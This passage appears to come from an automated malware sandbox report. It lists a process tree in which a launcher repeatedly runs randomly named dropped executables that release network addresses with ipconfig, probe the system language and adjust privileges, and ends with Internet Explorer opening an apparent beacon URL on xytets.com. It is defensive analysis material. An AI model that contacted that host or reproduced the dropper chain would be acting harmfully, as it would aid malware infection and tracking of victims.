        - C:\windows\system32\ipconfig.exe /release (PID:2672)
          Signatures: Gathers network information
  - C:\temp\CreateProcess.exe C:\Temp\i_ljdbwtolge.exe ups_ins (PID:2828)
    Signatures: Executes dropped EXE
    - C:\Temp\i_ljdbwtolge.exe ups_ins (PID:5004)
      Signatures: Executes dropped EXE; System Location Discovery: System Language Discovery; Suspicious use of AdjustPrivilegeToken
  - C:\temp\CreateProcess.exe C:\Temp\jdbvtnlgdy.exe ups_run (PID:696)
    Signatures: Executes dropped EXE
    - C:\Temp\jdbvtnlgdy.exe ups_run (PID:2312)
      Signatures: Executes dropped EXE; System Location Discovery: System Language Discovery
      - C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release (PID:1764)
        Signatures: Executes dropped EXE
        - C:\windows\system32\ipconfig.exe /release (PID:2660)
          Signatures: Gathers network information
  - C:\temp\CreateProcess.exe C:\Temp\i_jdbvtnlgdy.exe ups_ins (PID:5872)
    Signatures: Executes dropped EXE
    - C:\Temp\i_jdbvtnlgdy.exe ups_ins (PID:5284)
      Signatures: Executes dropped EXE; System Location Discovery: System Language Discovery; Suspicious use of AdjustPrivilegeToken
  - C:\temp\CreateProcess.exe C:\Temp\cavsnlfdxv.exe ups_run (PID:4104)
    Signatures: Executes dropped EXE
    - C:\Temp\cavsnlfdxv.exe ups_run (PID:1840)
      Signatures: Executes dropped EXE; System Location Discovery: System Language Discovery
      - C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release (PID:1192)
        Signatures: Executes dropped EXE
        - C:\windows\system32\ipconfig.exe /release (PID:4108)
          Signatures: Gathers network information
  - C:\temp\CreateProcess.exe C:\Temp\i_cavsnlfdxv.exe ups_ins (PID:704)
    Signatures: Executes dropped EXE
    - C:\Temp\i_cavsnlfdxv.exe ups_ins (PID:4316)
      Signatures: Executes dropped EXE; System Location Discovery: System Language Discovery; Suspicious use of AdjustPrivilegeToken
  - C:\temp\CreateProcess.exe C:\Temp\ifaxsqkica.exe ups_run (PID:1996)
    Signatures: Executes dropped EXE
    - C:\Temp\ifaxsqkica.exe ups_run (PID:4716)
      Signatures: Executes dropped EXE; System Location Discovery: System Language Discovery
      - C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release (PID:1540)
        Signatures: Executes dropped EXE
        - C:\windows\system32\ipconfig.exe /release (PID:1776)
          Signatures: Gathers network information
  - C:\temp\CreateProcess.exe C:\Temp\i_ifaxsqkica.exe ups_ins (PID:4428)
    Signatures: Executes dropped EXE
    - C:\Temp\i_ifaxsqkica.exe ups_ins (PID:4672)
      Signatures: Executes dropped EXE; System Location Discovery: System Language Discovery; Suspicious use of AdjustPrivilegeToken
  - C:\temp\CreateProcess.exe C:\Temp\fcxvpnhfzx.exe ups_run (PID:5060)
    Signatures: Executes dropped EXE
    - C:\Temp\fcxvpnhfzx.exe ups_run (PID:736)
      Signatures: Executes dropped EXE; System Location Discovery: System Language Discovery
      - C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release (PID:3296)
        Signatures: Executes dropped EXE
        - C:\windows\system32\ipconfig.exe /release (PID:2764)
          Signatures: Gathers network information
  - C:\temp\CreateProcess.exe C:\Temp\i_fcxvpnhfzx.exe ups_ins (PID:836)
    - C:\Temp\i_fcxvpnhfzx.exe ups_ins (PID:2228)
      Signatures: System Location Discovery: System Language Discovery; Suspicious use of AdjustPrivilegeToken
  - C:\temp\CreateProcess.exe C:\Temp\czurmkecwu.exe ups_run (PID:5656)
    - C:\Temp\czurmkecwu.exe ups_run (PID:1652)
      Signatures: System Location Discovery: System Language Discovery
      - C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release (PID:5852)
        - C:\windows\system32\ipconfig.exe /release (PID:3984)
          Signatures: Gathers network information
  - C:\temp\CreateProcess.exe C:\Temp\i_czurmkecwu.exe ups_ins (PID:3584)
    - C:\Temp\i_czurmkecwu.exe ups_ins (PID:2788)
      Signatures: System Location Discovery: System Language Discovery; Suspicious use of AdjustPrivilegeToken
  - C:\temp\CreateProcess.exe C:\Temp\kecwupezwr.exe ups_run (PID:5044)
    - C:\Temp\kecwupezwr.exe ups_run (PID:768)
      Signatures: System Location Discovery: System Language Discovery
      - C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release (PID:5152)
        - C:\windows\system32\ipconfig.exe /release (PID:3272)
          Signatures: Gathers network information
  - C:\temp\CreateProcess.exe C:\Temp\i_kecwupezwr.exe ups_ins (PID:5816)
    - C:\Temp\i_kecwupezwr.exe ups_ins (PID:5204)
      Signatures: System Location Discovery: System Language Discovery; Suspicious use of AdjustPrivilegeToken
  - C:\temp\CreateProcess.exe C:\Temp\hbztrljebw.exe ups_run (PID:1984)
    - C:\Temp\hbztrljebw.exe ups_run (PID:3064)
      Signatures: System Location Discovery: System Language Discovery
      - C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release (PID:2104)
        - C:\windows\system32\ipconfig.exe /release (PID:5280)
          Signatures: Gathers network information
  - C:\temp\CreateProcess.exe C:\Temp\i_hbztrljebw.exe ups_ins (PID:4752)
    - C:\Temp\i_hbztrljebw.exe ups_ins (PID:4784)
      Signatures: System Location Discovery: System Language Discovery; Suspicious use of AdjustPrivilegeToken
  - C:\temp\CreateProcess.exe C:\Temp\eywqojgbyt.exe ups_run (PID:4100)
    - C:\Temp\eywqojgbyt.exe ups_run (PID:4124)
      Signatures: System Location Discovery: System Language Discovery
      - C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release (PID:2924)
        - C:\windows\system32\ipconfig.exe /release (PID:5700)
          Signatures: Gathers network information
  - C:\temp\CreateProcess.exe C:\Temp\i_eywqojgbyt.exe ups_ins (PID:3188)
    - C:\Temp\i_eywqojgbyt.exe ups_ins (PID:556)
      Signatures: System Location Discovery: System Language Discovery; Suspicious use of AdjustPrivilegeToken
  - C:\temp\CreateProcess.exe C:\Temp\ytqlidbvtn.exe ups_run (PID:4580)
    - C:\Temp\ytqlidbvtn.exe ups_run (PID:4756)
      Signatures: System Location Discovery: System Language Discovery
      - C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release (PID:4668)
        - C:\windows\system32\ipconfig.exe /release (PID:4880)
          Signatures: Gathers network information
  - C:\temp\CreateProcess.exe C:\Temp\i_ytqlidbvtn.exe ups_ins (PID:1648)
    - C:\Temp\i_ytqlidbvtn.exe ups_ins (PID:4704)
      Signatures: System Location Discovery: System Language Discovery; Suspicious use of AdjustPrivilegeToken
  - C:\temp\CreateProcess.exe C:\Temp\gaytqljdbv.exe ups_run (PID:3024)
    - C:\Temp\gaytqljdbv.exe ups_run (PID:2272)
      Signatures: System Location Discovery: System Language Discovery
      - C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release (PID:2328)
        - C:\windows\system32\ipconfig.exe /release (PID:4064)
          Signatures: Gathers network information
  - C:\temp\CreateProcess.exe C:\Temp\i_gaytqljdbv.exe ups_ins (PID:5228)
    - C:\Temp\i_gaytqljdbv.exe ups_ins (PID:2188)
      Signatures: System Location Discovery: System Language Discovery; Suspicious use of AdjustPrivilegeToken
  - C:\temp\CreateProcess.exe C:\Temp\aysqkicavs.exe ups_run (PID:1032)
    - C:\Temp\aysqkicavs.exe ups_run (PID:4324)
      Signatures: System Location Discovery: System Language Discovery
      - C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release (PID:1460)
        - C:\windows\system32\ipconfig.exe /release (PID:1228)
          Signatures: Gathers network information
  - C:\temp\CreateProcess.exe C:\Temp\i_aysqkicavs.exe ups_ins (PID:6052)
    - C:\Temp\i_aysqkicavs.exe ups_ins (PID:1480)
- "C:\Program Files\Internet Explorer\iexplore.exe" http://xytets.com:2345/t.asp?os=home (PID:5760)
  Signatures: Modifies Internet Explorer settings; Suspicious use of FindShellTrayWindow; Suspicious use of SetWindowsHookEx; Suspicious use of WriteProcessMemory
  - "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:5760 CREDAT:17410 /prefetch:2 (PID:3964)
    Signatures: System Location Discovery: System Language Discovery; Modifies Internet Explorer settings; Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Enterprise v16
Downloads